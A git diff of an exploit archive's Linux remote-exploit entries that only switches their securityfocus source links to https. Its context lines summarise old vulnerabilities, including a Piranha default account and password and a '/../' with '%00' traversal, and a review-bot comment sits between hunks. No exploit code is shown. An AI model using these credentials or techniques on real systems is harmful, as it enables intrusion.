@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1046/info +// source: https://www.securityfocus.com/bid/1046/info IrcII is a well-known Internet Relay Chat (IRC) client for unix. Version 4.4-7 and possibly previous versions are known to be vulnerable to a buffer overflow condition in their direct client-to-client (DCC) chat implementation. It may be possible to execute arbitrary code on a client attempting to initiate a dcc chat. Exploitation this vulnerability could result in a remote compromise with the privileges of the user running the ircII client. diff --git a/exploits/linux/remote/19868.c b/exploits/linux/remote/19868.c index 0008dbef8..2e0fa22d3 100644 --- a/exploits/linux/remote/19868.c +++ b/exploits/linux/remote/19868.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1131/info +// source: https://www.securityfocus.com/bid/1131/info A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As listed in the Bugtraq posting revealing this vulnerability, overflows exist at: diff --git a/exploits/linux/remote/19879.txt b/exploits/linux/remote/19879.txt index a7a048d87..eaf41ca09 100644 --- a/exploits/linux/remote/19879.txt +++ b/exploits/linux/remote/19879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1148/info +source: https://www.securityfocus.com/bid/1148/info A default username and password has been discovered in the Piranha virtual server and load balancing package from RedHat. Version 0.4.12 of the piranha-gui program contains a default account, piranha, with the password 'q' (no quotes). Using this username and password, in conjunction with flaws in the passwd.php3 script (also part of piranha) will allow remote users to execute arbitrary commands on the machine. diff --git a/exploits/linux/remote/19891.c b/exploits/linux/remote/19891.c index 8e7f108f0..c462a30a3 100644 
--- a/exploits/linux/remote/19891.c +++ b/exploits/linux/remote/19891.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1165/info +// source: https://www.securityfocus.com/bid/1165/info A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS request and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop, while trying to decompress. This will prevent the sniffer from displaying further packets. If tcpdump is being used as some part of and intrusion detection system, this could allow an intruder to evade this system. diff --git a/exploits/linux/remote/19892.txt b/exploits/linux/remote/19892.txt index e6647517a..cf76f50eb 100644 --- a/exploits/linux/remote/19892.txt +++ b/exploits/linux/remote/19892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1165/info +source: https://www.securityfocus.com/bid/1165/info A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS request and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop, while trying to decompress. This will prevent the sniffer from displaying further packets. If tcpdump is being used as some part of and intrusion detection system, this could allow an intruder to evade this system. diff --git a/exploits/linux/remote/19926.c b/exploits/linux/remote/19926.c index 6eb9d27ae..6d3077ea8 100644 --- a/exploits/linux/remote/19926.c +++ b/exploits/linux/remote/19926.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1220/info +// source: https://www.securityfocus.com/bid/1220/info Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local. diff --git a/exploits/linux/remote/19947.c b/exploits/linux/remote/19947.c index bb02294b2..1b865e715 100644 --- a/exploits/linux/remote/19947.c +++ b/exploits/linux/remote/19947.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1233/info +// source: https://www.securityfocus.com/bid/1233/info A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for a remote attacker to execute arbitrary commands as root on the susceptible machine. The problem lies in the handling of the display information sent as part of an XDMCP 'FORWARD_QUERY' request. diff --git a/exploits/linux/remote/19948.c b/exploits/linux/remote/19948.c index 52598482d..838bc0794 100644 --- a/exploits/linux/remote/19948.c +++ b/exploits/linux/remote/19948.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1233/info +// source: https://www.securityfocus.com/bid/1233/info A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for a remote attacker to execute arbitrary commands as root on the susceptible machine. The problem lies in the handling of the display information sent as part of an XDMCP 'FORWARD_QUERY' request. diff --git a/exploits/linux/remote/19966.c b/exploits/linux/remote/19966.c index 96f1469ae..f1a487648 100644 --- a/exploits/linux/remote/19966.c +++ b/exploits/linux/remote/19966.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1252/info +// source: https://www.securityfocus.com/bid/1252/info A vulnerability exists in the MDBMS database, written by Marty Bochane. By supplying a line of sufficient length to the MDBMS server, containing machine executable code, it is possible for a remote attacker to execute arbitrary commands as the user the db is running as. diff --git a/exploits/linux/remote/19978.pl b/exploits/linux/remote/19978.pl index 19485c878..384e0c1d1 100755 --- a/exploits/linux/remote/19978.pl +++ b/exploits/linux/remote/19978.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1289/info +source: https://www.securityfocus.com/bid/1289/info A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with. diff --git a/exploits/linux/remote/19983.c b/exploits/linux/remote/19983.c index 3900b168f..a708c1b2f 100644 --- a/exploits/linux/remote/19983.c +++ b/exploits/linux/remote/19983.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1297/info +// source: https://www.securityfocus.com/bid/1297/info NetWin's DMail is an alternative mail-server solution for unix and NT servers. There is a buffer overflow vulnerability in the server daemon that could allow remote attackers to execute arbitrary commands as root or cause a denial of service. The overflow occurs when a large buffer is sent to argument the ETRN command: If over 260 characters are sent, the stack is corrupted and the mailserver will crash. diff --git a/exploits/linux/remote/19998.c b/exploits/linux/remote/19998.c index bbbfa9379..f7de5ad0b 100644 --- a/exploits/linux/remote/19998.c +++ b/exploits/linux/remote/19998.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1316/info +// source: https://www.securityfocus.com/bid/1316/info innd 2.2.2 contains a remotely exploitable buffer overflow in code reached when a cancel request is sent to the "control" newsgroup, under the following condition: the cancel request contains a valid Message-ID but the From/Sender fields differ between the cancel request and the post referenced by the Message-ID. This attack only works against machines running INN with "verifycancels = true" diff --git a/exploits/linux/remote/20031.c b/exploits/linux/remote/20031.c index b3c9bcdac..8b623beec 100644 --- a/exploits/linux/remote/20031.c +++ b/exploits/linux/remote/20031.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1387/info +// source: https://www.securityfocus.com/bid/1387/info Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet. diff --git a/exploits/linux/remote/20043.c b/exploits/linux/remote/20043.c index 3b4e51690..d8e3f310f 100644 --- a/exploits/linux/remote/20043.c +++ b/exploits/linux/remote/20043.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1404/info +// source: https://www.securityfocus.com/bid/1404/info Dalnet ircd is a server for a popular internet chat application, IRC (Internet Relay Chat). The implementation for one of its features, the "summon" command, has a hole which could grant an attacker remote access on the host running the server (with the privs of the server). The vulnerability is a buffer overflow (due to use of an sprintf with user input) and rather difficult to exploit. The reason for this is that the shellcode must be divided into a number of variables, one of them being the hostname (which is obtained via reverse lookup, so dns poisoning would be involved) and then reconstructed in memory and executed on the stack. Also, the "summons" command is not enabled in the ircd server by default -- it has to be defined at compile time. Nonetheless, in theory this can be exploited so patches should be applied. diff --git a/exploits/linux/remote/20060.c b/exploits/linux/remote/20060.c index 9fa8e37bf..3fc04a309 100644 --- a/exploits/linux/remote/20060.c +++ b/exploits/linux/remote/20060.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1436/info +// source: https://www.securityfocus.com/bid/1436/info BitchX IRC clients, versions 75 up to and including 1.0c16, are vulnerable to a Denial of Service and possible remote execution of code. By /invite-ing someone to a channel name containing formatting characters (%s, %n, etc) an IRC user can cause the targetted user's BitchX client to seg-fault. This is caused by the fact that bitchx passes the channel name from the invite into the logging function as its format string [which is used directly in a vsprintf], rather than as an argument to the format. This also affects the KILL command. diff --git a/exploits/linux/remote/20061.c b/exploits/linux/remote/20061.c index 54dfb2a13..39ccc28c1 100644 --- a/exploits/linux/remote/20061.c +++ b/exploits/linux/remote/20061.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1445/info +// source: https://www.securityfocus.com/bid/1445/info A vulnerability exists in the 'canna' package, as distributed with a number of free operating systems, and available for other systems. Version 3.5b2 is vulnerable. It is assumed versions prior to this are also vulnerable. By supplying an overly large username or groupname with the IR_INIT command, it is possible to trigger a remote buffer overflow condition. diff --git a/exploits/linux/remote/20075.c b/exploits/linux/remote/20075.c index d3c19678d..67642c0d6 100644 --- a/exploits/linux/remote/20075.c +++ b/exploits/linux/remote/20075.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1480/info +// source: https://www.securityfocus.com/bid/1480/info A vulnerability exists in the 'rpc.statd' program, which is part of the 'nfs-utils' package that is shipped with a number of popular Linux distributions. Because of a format-string vulnerability when calling the 'syslog()' function, a remote attacker can execute code as root. diff --git a/exploits/linux/remote/20076.c b/exploits/linux/remote/20076.c index 68a767069..dc1830ba4 100644 --- a/exploits/linux/remote/20076.c +++ b/exploits/linux/remote/20076.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1480/info +// source: https://www.securityfocus.com/bid/1480/info A vulnerability exists in the 'rpc.statd' program, which is part of the 'nfs-utils' package that is shipped with a number of popular Linux distributions. Because of a format-string vulnerability when calling the 'syslog()' function, a remote attacker can execute code as root. diff --git a/exploits/linux/remote/20077.c b/exploits/linux/remote/20077.c index 57cef3fb8..3a3525191 100644 --- a/exploits/linux/remote/20077.c +++ b/exploits/linux/remote/20077.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1480/info +// source: https://www.securityfocus.com/bid/1480/info A vulnerability exists in the 'rpc.statd' program, which is part of the 'nfs-utils' package that is shipped with a number of popular Linux distributions. Because of a format-string vulnerability when calling the 'syslog()' function, a remote attacker can execute code as root. diff --git a/exploits/linux/remote/20105.txt b/exploits/linux/remote/20105.txt index 6363cb1b7..30fde2874 100644 --- a/exploits/linux/remote/20105.txt +++ b/exploits/linux/remote/20105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1513/info +source: https://www.securityfocus.com/bid/1513/info There is a vulnerability in the Linux pam_console module that could allow an attacker to remotely reboot the workstation or perform other actions limited to local users. If a workstation is configured to use a display manager (xdm, gdm, kdm, etc.) AND has XDMCP enabled, it is possible for a user who logs in remotely to use Xnest -query to log in on display :1, which is recognized as the system console. This vulnerability is only present if the workstation is running a graphical login manager such as gdm or kdm. diff --git a/exploits/linux/remote/20143.txt b/exploits/linux/remote/20143.txt index bf7b63167..eb4626af0 100644 --- a/exploits/linux/remote/20143.txt +++ b/exploits/linux/remote/20143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1550/info +source: https://www.securityfocus.com/bid/1550/info ntop is a tool that shows the network usage, similar to what the popular top Unix command does. Starting ntop in web mode (with the -w parameter) starts ntop with it's own built in HTTP server, to allow remote access to the functions it provides. ntop does not properly authenticate requests and is vulnerable to a ../../ request whereby unauthorized files can be retrieved, including files which are only readable by root. 
diff --git a/exploits/linux/remote/20145.c b/exploits/linux/remote/20145.c index b797711fb..8b718b02b 100644 --- a/exploits/linux/remote/20145.c +++ b/exploits/linux/remote/20145.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1555/info +// source: https://www.securityfocus.com/bid/1555/info Aptis Software offers a billing / provisioning solution for ISPs called TotalBill. One component of the TotalBill package is a network service called Sysgen that listens on or around port 9998. It allows a client connectiing to it to execute any command on the host it is running on (with whatever uid the service runs as, typically root) without any authentication. If this service is not filtered, anonymous attackers can easily gain root access on the target host by remotely exploiting this naive service. Other components of TotalBill may be vulnerable also (noteably cc_queue to a buffer overflow attack) but none are confirmed. diff --git a/exploits/linux/remote/20157.c b/exploits/linux/remote/20157.c index e3e5c5573..407d70c81 100644 --- a/exploits/linux/remote/20157.c +++ b/exploits/linux/remote/20157.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1591/info +// source: https://www.securityfocus.com/bid/1591/info It is possible to either execute arbitrary code or crash a remote system running University of Minnesota's Gopher Daemon, depending on the data entered. An unchecked buffer exists in the 'halidate' function of Gopherd, where the 512 byte buffer can be overwritten with approximately 600 bytes of data. diff --git a/exploits/linux/remote/20159.c b/exploits/linux/remote/20159.c index 5afce9502..3be52a7a2 100644 --- a/exploits/linux/remote/20159.c +++ b/exploits/linux/remote/20159.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1598/info +// source: https://www.securityfocus.com/bid/1598/info Darxite 0.4 does not do proper bounds checking on user-supplied data during the login process, relying on sprintf() to deliver the data into a 256 character buffer. Therefore, it is possible for an attacker to supply arbitrary code for execution at the privilege level of the Darxite user. diff --git a/exploits/linux/remote/20161.txt b/exploits/linux/remote/20161.txt index 7bcaef6fa..cb90610e8 100644 --- a/exploits/linux/remote/20161.txt +++ b/exploits/linux/remote/20161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1601/info +source: https://www.securityfocus.com/bid/1601/info A vulnerability exists in versions 1.4.2 and earlier of the X-Chat IRC client. By supplying commands enclosed in backticks (``) in URL's sent to X-Chat, it is possible to execute arbitrary commands should the X-Chat user decide to view the link by clicking on it. This is due to the manner in which X-Chat launches pages for viewing. diff --git a/exploits/linux/remote/20210.txt b/exploits/linux/remote/20210.txt index f9e50da00..ac83a65d3 100644 --- a/exploits/linux/remote/20210.txt +++ b/exploits/linux/remote/20210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1656/info +source: https://www.securityfocus.com/bid/1656/info WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP which allows users to create, edit and share documents using the HTTP protocol. A particular REQUEST METHOD, PROPFIND, allows users to retrieve resource properties such as displayname, date last modified, and others. Apache web server as installed by SuSE 6.4 has WebDAV enabled for the entire file structure of the server. By making a specific, properly structured request to the Apache web server, it is possible to obtain information which is equivalent to a directory listing. 
diff --git a/exploits/linux/remote/20220.txt b/exploits/linux/remote/20220.txt index 43ad02a9d..b17c2c033 100644 --- a/exploits/linux/remote/20220.txt +++ b/exploits/linux/remote/20220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1678/info +source: https://www.securityfocus.com/bid/1678/info The default configuration files for versions of mod_perl shipped with Mandrake Linux 6.1 through 7.1 contain a misconfiguration that can be a security concern in some situations. The /perl directory is part of the webserver's root tree (the subdirectory tree from which files are accessable on the webserver..) that is used to store perl scripts. In the configuration file for mod_perl, the apache perl interpreter module, the directory is permitted to be "indexed".. meaning that the webserver will display the contents of the directory if it is requested by itself. The result is that an attacker can see what files are in /perl. While this bug does not affect how the webserver interprets the files in that directory (eg., it will still execute them), knowing what is there to be executed can allow for more targeted and intelligent attacks against scripts known to be vulnerable listed there. diff --git a/exploits/linux/remote/20236.txt b/exploits/linux/remote/20236.txt index a95bba65c..72a4cef32 100644 --- a/exploits/linux/remote/20236.txt +++ b/exploits/linux/remote/20236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1707/info +source: https://www.securityfocus.com/bid/1707/info By submitting a specific url to the web server ("http://hosts.any/doc/packages/") , any user from any host may obtain a list of packages installed on a S.u.S.E 6.3 or 6.4 system. This problem is due to a configuration in the Apache httpd.conf supplied with S.u.S.E that permits anyone to request documents from this webroot subdirectory. The end result is that attackers will know what packages the victim has installed, which can assist in executing more complicated attacks. 
diff --git a/exploits/linux/remote/20237.c b/exploits/linux/remote/20237.c index 728d32309..99565e84a 100644 --- a/exploits/linux/remote/20237.c +++ b/exploits/linux/remote/20237.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1709/info +// source: https://www.securityfocus.com/bid/1709/info A buffer overflow vulnerability exists in the popular mail client Pine 4.21 (and possibly earlier versions), relating to the function which regularly checks for incoming email. In standard e-mail message headers is a field that holds the name and address of the sender. It typically looks like and is presented in pine like this: diff --git a/exploits/linux/remote/20246.txt b/exploits/linux/remote/20246.txt index bde14e557..310375709 100644 --- a/exploits/linux/remote/20246.txt +++ b/exploits/linux/remote/20246.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1725/info +source: https://www.securityfocus.com/bid/1725/info Web+ is a development language for use in creating web-based client/server applications. diff --git a/exploits/linux/remote/20253.sh b/exploits/linux/remote/20253.sh index 58dbf05ed..35a4cdf6f 100755 --- a/exploits/linux/remote/20253.sh +++ b/exploits/linux/remote/20253.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1742/info +source: https://www.securityfocus.com/bid/1742/info A vulnerability exists in the 1.2.x releases of scp which, if properly exploited using a modified scp binary on the server end, can permit the remote server to spoof local pathnames and overwrite files belonging to the local user. diff --git a/exploits/linux/remote/20293.pl b/exploits/linux/remote/20293.pl index 171962bbf..ca44ea18e 100755 --- a/exploits/linux/remote/20293.pl +++ b/exploits/linux/remote/20293.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1804/info +source: https://www.securityfocus.com/bid/1804/info Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release). diff --git a/exploits/linux/remote/20308.c b/exploits/linux/remote/20308.c index c6bb32cd7..76290e444 100644 --- a/exploits/linux/remote/20308.c +++ b/exploits/linux/remote/20308.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1816/info +// source: https://www.securityfocus.com/bid/1816/info Samba is an open source software suite that provides seamless file and print services to SMB/CIFS clients. Certain older versions of Samba had a remotely exploitable buffer overflow vulnerability. This vulnerability was in the password function of the authentication mechanism which is to say a user could supply an overly long password to the Samba server and trigger a buffer overflow. diff --git a/exploits/linux/remote/20496.c b/exploits/linux/remote/20496.c index 57dd02881..e1a9fe94a 100644 --- a/exploits/linux/remote/20496.c +++ b/exploits/linux/remote/20496.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2099/info +// source: https://www.securityfocus.com/bid/2099/info Oops is a freely available proxy server package, written by Igor Khasilev. A problem exists in the package which could allow for the arbitrary execution of code. diff --git a/exploits/linux/remote/20569.c b/exploits/linux/remote/20569.c index 205a4e25c..4add2a298 100644 --- a/exploits/linux/remote/20569.c +++ b/exploits/linux/remote/20569.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2254/info +// source: https://www.securityfocus.com/bid/2254/info micq is a chat program for Linux systems. diff --git a/exploits/linux/remote/20597.txt b/exploits/linux/remote/20597.txt index 9882cfcc4..26fc861b2 100644 --- a/exploits/linux/remote/20597.txt 
+++ b/exploits/linux/remote/20597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2310/info +source: https://www.securityfocus.com/bid/2310/info Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files. diff --git a/exploits/linux/remote/20619.c b/exploits/linux/remote/20619.c index 298a26c31..c3f1fd31b 100644 --- a/exploits/linux/remote/20619.c +++ b/exploits/linux/remote/20619.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2352/info +// source: https://www.securityfocus.com/bid/2352/info Linuxconf is a Linux configuration utility from Solucorp. diff --git a/exploits/linux/remote/20622.c b/exploits/linux/remote/20622.c index cb6ab9b4c..dcff597e2 100644 --- a/exploits/linux/remote/20622.c +++ b/exploits/linux/remote/20622.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2360/info +// source: https://www.securityfocus.com/bid/2360/info Versions of CTRLServer are vulnerable to malicious user-supplied input. A failure to properly bounds-check data passed to the cfgfileget() command leads to an overflow, which, properly exploited, can result in remote execution of malicious code with root privilege. diff --git a/exploits/linux/remote/20636.txt b/exploits/linux/remote/20636.txt index 385d35950..16fcc6a21 100644 --- a/exploits/linux/remote/20636.txt +++ b/exploits/linux/remote/20636.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2385/info +source: https://www.securityfocus.com/bid/2385/info It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory. diff --git a/exploits/linux/remote/20690.sh b/exploits/linux/remote/20690.sh index 35ed4cd2d..f30147b72 100755 --- a/exploits/linux/remote/20690.sh +++ b/exploits/linux/remote/20690.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2496/info +source: https://www.securityfocus.com/bid/2496/info Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits. diff --git a/exploits/linux/remote/20727.c b/exploits/linux/remote/20727.c index 36f4d832e..6bac778f2 100644 --- a/exploits/linux/remote/20727.c +++ b/exploits/linux/remote/20727.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2540/info +// source: https://www.securityfocus.com/bid/2540/info NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'. diff --git a/exploits/linux/remote/20748.pl b/exploits/linux/remote/20748.pl index 594605565..0f09fcb11 100755 --- a/exploits/linux/remote/20748.pl +++ b/exploits/linux/remote/20748.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2576/info +source: https://www.securityfocus.com/bid/2576/info A format string bug in the logging facility of the cfingerd "Configurable Finger Daemon" allows remote users to attain root privileges and execute arbitrary code. 
diff --git a/exploits/linux/remote/20749.c b/exploits/linux/remote/20749.c index 1773d92a9..4ccf01773 100644 --- a/exploits/linux/remote/20749.c +++ b/exploits/linux/remote/20749.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2576/info +// source: https://www.securityfocus.com/bid/2576/info A format string bug in the logging facility of the cfingerd "Configurable Finger Daemon" allows remote users to attain root privileges and execute arbitrary code. diff --git a/exploits/linux/remote/20765.pl b/exploits/linux/remote/20765.pl index 5551b3983..71d189a30 100755 --- a/exploits/linux/remote/20765.pl +++ b/exploits/linux/remote/20765.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2602/info +# source: https://www.securityfocus.com/bid/2602/info # # The Linux kernel includes a built-in firewall implementation called IPTables. IPTables supports stateful inspection of several application protocols, one of which is FTP. The inspection is used to facilitate outgoing PORT connections for FTP data transfers when clients or servers are behind firewalls. # diff --git a/exploits/linux/remote/20902.c b/exploits/linux/remote/20902.c index a3134d6c9..702901c73 100644 --- a/exploits/linux/remote/20902.c +++ b/exploits/linux/remote/20902.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2831/info +// source: https://www.securityfocus.com/bid/2831/info TIAtunnel is a freely available IRC session bouncing software package. It is distributed by the pkcrew. diff --git a/exploits/linux/remote/20908.c b/exploits/linux/remote/20908.c index 38bf3018a..4dfb71650 100644 --- a/exploits/linux/remote/20908.c +++ b/exploits/linux/remote/20908.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2840/info +// source: https://www.securityfocus.com/bid/2840/info The possibility for a buffer overflow condition exists in the xinetd daemon. diff --git a/exploits/linux/remote/20924.txt b/exploits/linux/remote/20924.txt index d02d47f9d..650dc547a 100644 
--- a/exploits/linux/remote/20924.txt +++ b/exploits/linux/remote/20924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2867/info +source: https://www.securityfocus.com/bid/2867/info MDBMS is a free relational database management system. diff --git a/exploits/linux/remote/20929.c b/exploits/linux/remote/20929.c index b3a71bdb6..78e16a810 100644 --- a/exploits/linux/remote/20929.c +++ b/exploits/linux/remote/20929.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2879/info +// source: https://www.securityfocus.com/bid/2879/info ghttpd is a freely available, open source web server for Unix systems. ghttpd supports CGI and is easy to configure and use. diff --git a/exploits/linux/remote/20936.c b/exploits/linux/remote/20936.c index 9f3eb16e7..d71ad97e1 100644 --- a/exploits/linux/remote/20936.c +++ b/exploits/linux/remote/20936.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2885/info +// source: https://www.securityfocus.com/bid/2885/info NetSQL is an implementation of a database and toolset distributed by Munica Corporation. NetSQL is part of 5 piece software package called the Webpak, containing utilities for features such as web boards, membership, and online calendars. diff --git a/exploits/linux/remote/20953.c b/exploits/linux/remote/20953.c index 519d34b68..8cad9baeb 100644 --- a/exploits/linux/remote/20953.c +++ b/exploits/linux/remote/20953.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2908/info +// source: https://www.securityfocus.com/bid/2908/info eXtremail is a freeware SMTP server available for Linux and AIX. diff --git a/exploits/linux/remote/20954.pl b/exploits/linux/remote/20954.pl index 99382bbaa..9bc5213a5 100755 --- a/exploits/linux/remote/20954.pl +++ b/exploits/linux/remote/20954.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2908/info +source: https://www.securityfocus.com/bid/2908/info eXtremail is a freeware SMTP server available for Linux and AIX. 
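Review bot: in 20954.pl the replaced first line is still bare text, `source: https://www.securityfocus.com/bid/2908/info`, with no comment marker, while the sibling 20953.c for the same BID gains `// source:` in this patch and 20765.pl already carries `# source:`. The file is mode 100755 and the hunk starts at line 1, so the interpreter would read that line as code rather than as a comment. Suggest `# source: ...` here and in the other .pl and .sh entries touched by this change, or a sentence in the commit message on why only the .c files get a comment prefix.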
diff --git a/exploits/linux/remote/20994.txt b/exploits/linux/remote/20994.txt index 658109e1e..0d1bb362c 100644 --- a/exploits/linux/remote/20994.txt +++ b/exploits/linux/remote/20994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2986/info +source: https://www.securityfocus.com/bid/2986/info poprelayd is a script that parses /var/log/maillog for valid pop logins, and based upon the login of a client, allows the person logged into the pop3 service to also send email from the ip address they're accessing the system with. diff --git a/exploits/linux/remote/20998.c b/exploits/linux/remote/20998.c index 64ede3bd5..89debf625 100644 --- a/exploits/linux/remote/20998.c +++ b/exploits/linux/remote/20998.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/3006/info +// source: https://www.securityfocus.com/bid/3006/info // // xloadimage is a utility used for displaying images of varying formats on X11 servers. // diff --git a/exploits/linux/remote/21017.txt b/exploits/linux/remote/21017.txt index 9123604c8..146bf05df 100644 --- a/exploits/linux/remote/21017.txt +++ b/exploits/linux/remote/21017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3062/info +source: https://www.securityfocus.com/bid/3062/info Squid is a free client-side web proxy that retrieves cached web pages for quick browsers and a reduction in bandwidth consumption. diff --git a/exploits/linux/remote/21019.txt b/exploits/linux/remote/21019.txt index eba6feb98..127a4a262 100644 --- a/exploits/linux/remote/21019.txt +++ b/exploits/linux/remote/21019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3067/info +source: https://www.securityfocus.com/bid/3067/info A vulnerability has been discovered in Horde Imp which may allow an attacker to access arbitrary system files. The issue occurs due to insufficient sanity checks on user-supplied URI parameters. diff --git a/exploits/linux/remote/21037.c b/exploits/linux/remote/21037.c index 954f5168d..84d10302a 100644 
